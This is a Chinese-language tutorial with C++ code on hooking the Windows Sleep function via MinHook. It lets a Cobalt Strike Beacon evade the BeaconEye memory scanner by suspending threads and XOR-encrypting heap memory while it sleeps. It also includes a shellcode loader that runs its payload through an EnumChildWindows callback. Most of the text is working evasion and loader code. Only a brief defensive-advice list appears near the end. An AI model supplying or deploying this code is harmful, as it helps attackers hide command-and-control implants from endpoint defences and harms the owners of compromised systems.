挂钩Sleep函数绕过BeaconEye检测技术详解<\/h1>

1. 技术原理概述<\/h2>
该技术通过挂钩Windows系统的Sleep函数，在Cobalt Strike的睡眠期间对堆栈进行加密，从而避免杀毒软件扫描到内存中的恶意载荷。核心思想是利用杀毒软件不会持续扫描内存的特性，在Beacon睡眠时加密内存，唤醒时解密，以此规避检测。<\/p>

2. 技术实现关键步骤<\/h2>

2.1 线程控制机制<\/h3>

挂起线程<\/h4>
void<\/span> PendingThread<\/span>(DWORD processid, DWORD Id) {
<\/span><\/span>    HANDLE h =<\/span> CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0<\/span>);
<\/span><\/span>    if<\/span> (h !=<\/span> INVALID_HANDLE_VALUE) {
<\/span><\/span>        THREADENTRY32 th;
<\/span><\/span>        th.dwSize =<\/span> sizeof<\/span>(th);
<\/span><\/span>        if<\/span> (Thread32First(h, &<\/span>th)) {
<\/span><\/span>            do<\/span> {
<\/span><\/span>                if<\/span> (th.dwSize >=<\/span> FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) +<\/span> sizeof<\/span>(th.th32OwnerProcessID)) {
<\/span><\/span>                    if<\/span> (th.th32ThreadID !=<\/span> Id &&<\/span> th.th32OwnerProcessID ==<\/span> processid) {
<\/span><\/span>                        HANDLE thread<\/span> =<\/span> OpenThread(THREAD_ALL_ACCESS, FALSE, th.th32ThreadID);
<\/span><\/span>                        if<\/span> (thread<\/span> !=<\/span> NULL) {
<\/span><\/span>                            SuspendThread(thread<\/span>);
<\/span><\/span>                            CloseHandle(thread<\/span>);
<\/span><\/span>                        }
<\/span><\/span>                    }
<\/span><\/span>                }
<\/span><\/span>                th.dwSize =<\/span> sizeof<\/span>(th);
<\/span><\/span>            } while<\/span> (Thread32Next(h, &<\/span>th));
<\/span><\/span>        }
<\/span><\/span>        CloseHandle(h);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>恢复线程<\/h4>
void<\/span> RestoreThreads<\/span>(DWORD processid, DWORD Id) {
<\/span><\/span>    HANDLE h =<\/span> CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0<\/span>);
<\/span><\/span>    if<\/span> (h !=<\/span> INVALID_HANDLE_VALUE) {
<\/span><\/span>        THREADENTRY32 th;
<\/span><\/span>        th.dwSize =<\/span> sizeof<\/span>(th);
<\/span><\/span>        if<\/span> (Thread32First(h, &<\/span>th)) {
<\/span><\/span>            do<\/span> {
<\/span><\/span>                if<\/span> (th.dwSize >=<\/span> FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) +<\/span> sizeof<\/span>(th.th32OwnerProcessID)) {
<\/span><\/span>                    if<\/span> (th.th32ThreadID !=<\/span> Id &&<\/span> th.th32OwnerProcessID ==<\/span> processid) {
<\/span><\/span>                        HANDLE thread<\/span> =<\/span> ::<\/span>OpenThread(THREAD_ALL_ACCESS, FALSE, th.th32ThreadID);
<\/span><\/span>                        if<\/span> (thread<\/span> !=<\/span> NULL) {
<\/span><\/span>                            ResumeThread(thread<\/span>);
<\/span><\/span>                            CloseHandle(thread<\/span>);
<\/span><\/span>                        }
<\/span><\/span>                    }
<\/span><\/span>                }
<\/span><\/span>                th.dwSize =<\/span> sizeof<\/span>(th);
<\/span><\/span>            } while<\/span> (Thread32Next(h, &<\/span>th));
<\/span><\/span>        }
<\/span><\/span>        CloseHandle(h);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 堆栈加密技术<\/h3>
堆遍历与加密<\/h4>
PROCESS_HEAP_ENTRY entry;
<\/span><\/span>const<\/span> char<\/span> key[] =<\/span> "DWADWADWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASADSADSADSADAS"<\/span>;
<\/span><\/span>size_t keySize =<\/span> sizeof<\/span>(key);
<\/span><\/span>
<\/span><\/span>void<\/span> Stackencryption<\/span>() {
<\/span><\/span>    SecureZeroMemory(&<\/span>entry, sizeof<\/span>(entry));
<\/span><\/span>    while<\/span> (HeapWalk(GetProcessHeap(), &<\/span>entry)) {
<\/span><\/span>        if<\/span> ((entry.wFlags &<\/span> PROCESS_HEAP_ENTRY_BUSY) !=<\/span> 0<\/span>) {
<\/span><\/span>            xor_bidirectional_encode((PBYTE)(entry.lpData), entry.cbData, (PBYTE)key, keySize);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>异或加密算法<\/h4>
void<\/span> xor_bidirectional_encode<\/span>(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN PBYTE bKey, IN SIZE_T sKeySize) {
<\/span><\/span>    for<\/span> (size_t i =<\/span> 0<\/span>, j =<\/span> 0<\/span>; i <<\/span> sShellcodeSize; i++<\/span>, j++<\/span>) {
<\/span><\/span>        if<\/span> (j ><\/span> sKeySize) {
<\/span><\/span>            j =<\/span> 0<\/span>;
<\/span><\/span>        }
<\/span><\/span>        pShellcode[i] =<\/span> pShellcode[i] ^<\/span> bKey[j %<\/span> 8<\/span>] +<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.3 Sleep函数挂钩实现<\/h3>
MinHook初始化<\/h4>
#include<\/span> "MinHook.h"<\/span>
<\/span><\/span><\/span>#pragma comment(lib,"C:\\Users\\Admin\\Desktop\\bin\\libMinHook.x86.lib");
<\/span><\/span><\/span><\/code><\/pre>挂钩实现<\/h4>
void<\/span>(WINAPI*<\/span> SleepTest)(DWORD dwMiliseconds);
<\/span><\/span>
<\/span><\/span>void<\/span> WINAPI HookedSleep<\/span>(DWORD dwMiliseconds) {
<\/span><\/span>    DWORD time =<\/span> dwMiliseconds;
<\/span><\/span>    if<\/span> (time ><\/span> 3000<\/span>) {
<\/span><\/span>        \/\/ 挂起线程
<\/span><\/span><\/span><\/span>        PendingThread(GetCurrentProcessId(), GetCurrentThreadId());
<\/span><\/span>        \/\/ 加密
<\/span><\/span><\/span><\/span>        Stackencryption();
<\/span><\/span>        SleepTest(dwMiliseconds);
<\/span><\/span>        \/\/ 解密
<\/span><\/span><\/span><\/span>        Stackencryption();
<\/span><\/span>        \/\/ 恢复线程
<\/span><\/span><\/span><\/span>        RestoreThreads(GetCurrentProcessId(), GetCurrentThreadId());
<\/span><\/span>    }
<\/span><\/span>    else<\/span> {
<\/span><\/span>        SleepTest(time);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>template<\/span> <<\/span>typename<\/span> T><\/span>
<\/span><\/span>inline<\/span> MH_STATUS MH_CreateHookEx(LPVOID pTarget, LPVOID pDetour, T**<\/span> ppOriginal) {
<\/span><\/span>    return<\/span> MH_CreateHook<\/span>(pTarget, pDetour, reinterpret_cast<\/span><<\/span>LPVOID*><\/span>(ppOriginal));
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>template<\/span> <<\/span>typename<\/span> T><\/span>
<\/span><\/span>inline<\/span> MH_STATUS MH_CreateHookApiEx(LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, T**<\/span> ppOriginal) {
<\/span><\/span>    return<\/span> MH_CreateHookApi<\/span>(pszModule, pszProcName, pDetour, reinterpret_cast<\/span><<\/span>LPVOID*><\/span>(ppOriginal));
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>BOOL HookTest<\/span>() {
<\/span><\/span>    if<\/span> (MH_Initialize() !=<\/span> MH_OK) {
<\/span><\/span>        return<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>    if<\/span> (MH_CreateHookApiEx(L<\/span>"kernel32.dll"<\/span>, "Sleep"<\/span>, &<\/span>HookedSleep, &<\/span>SleepTest) !=<\/span> MH_OK) {
<\/span><\/span>        return<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>    if<\/span> (MH_EnableHook(MH_ALL_HOOKS) !=<\/span> MH_OK) {
<\/span><\/span>        return<\/span> 1<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 完整实现流程<\/h2>

初始化Hook<\/strong>：调用HookTest()<\/code>函数初始化MinHook并挂钩Sleep函数<\/li>
Shellcode加载<\/strong>：
unsigned<\/span> char<\/span> dll[263168<\/span>] =<\/span> { shellcode };
<\/span><\/span>SIZE_T size =<\/span> sizeof<\/span>(dll);
<\/span><\/span>SIZE_T bytesWritten =<\/span> 0<\/span>;
<\/span><\/span>DWORD oldProtect =<\/span> 0<\/span>;
<\/span><\/span>void<\/span>*<\/span> sh =<\/span> VirtualAllocEx(GetCurrentProcess(), 0<\/span>, (SIZE_T)size, MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE);
<\/span><\/span>WriteProcessMemory(GetCurrentProcess(), sh, dll, size, &<\/span>bytesWritten);
<\/span><\/span>VirtualProtectEx(GetCurrentProcess(), sh, size, PAGE_EXECUTE_READ, &<\/span>oldProtect);
<\/span><\/span>EnumChildWindows(NULL, (WNDENUMPROC)sh, NULL);
<\/span><\/span><\/code><\/pre><\/li>
Sleep触发加密<\/strong>：当Beacon调用Sleep函数时：

挂起所有非当前线程<\/li>
加密堆栈内存<\/li>
执行原始Sleep函数<\/li>
解密堆栈内存<\/li>
恢复挂起的线程<\/li>
<\/ul>
<\/li>
<\/ol>
4. 技术要点总结<\/h2>

线程控制<\/strong>：通过CreateToolhelp32Snapshot<\/code>获取线程快照，使用SuspendThread<\/code>和ResumeThread<\/code>控制线程状态<\/li>
堆遍历<\/strong>：使用HeapWalk<\/code>函数遍历进程堆内存<\/li>
内存加密<\/strong>：采用简单的异或加密算法，可替换为更复杂的加密方式如RC4<\/li>
函数挂钩<\/strong>：使用MinHook库挂钩Sleep函数，实现加密\/解密逻辑注入<\/li>
条件触发<\/strong>：仅在Sleep时间超过3000ms时执行加密操作，避免频繁加解密影响性能<\/li>
<\/ol>
5. 防御建议<\/h2>

监控关键API挂钩行为，特别是Sleep等常用函数<\/li>
实现内存扫描机制，检测异常的内存加密行为<\/li>
加强对堆遍历和线程控制API的监控<\/li>
结合行为分析检测异常的线程挂起\/恢复模式<\/li>
<\/ol>
该技术通过巧妙地利用杀毒软件扫描的时间差和内存加密技术，有效规避了BeaconEye等内存扫描工具的检测，展示了高级内存规避技术的实现原理。<\/p>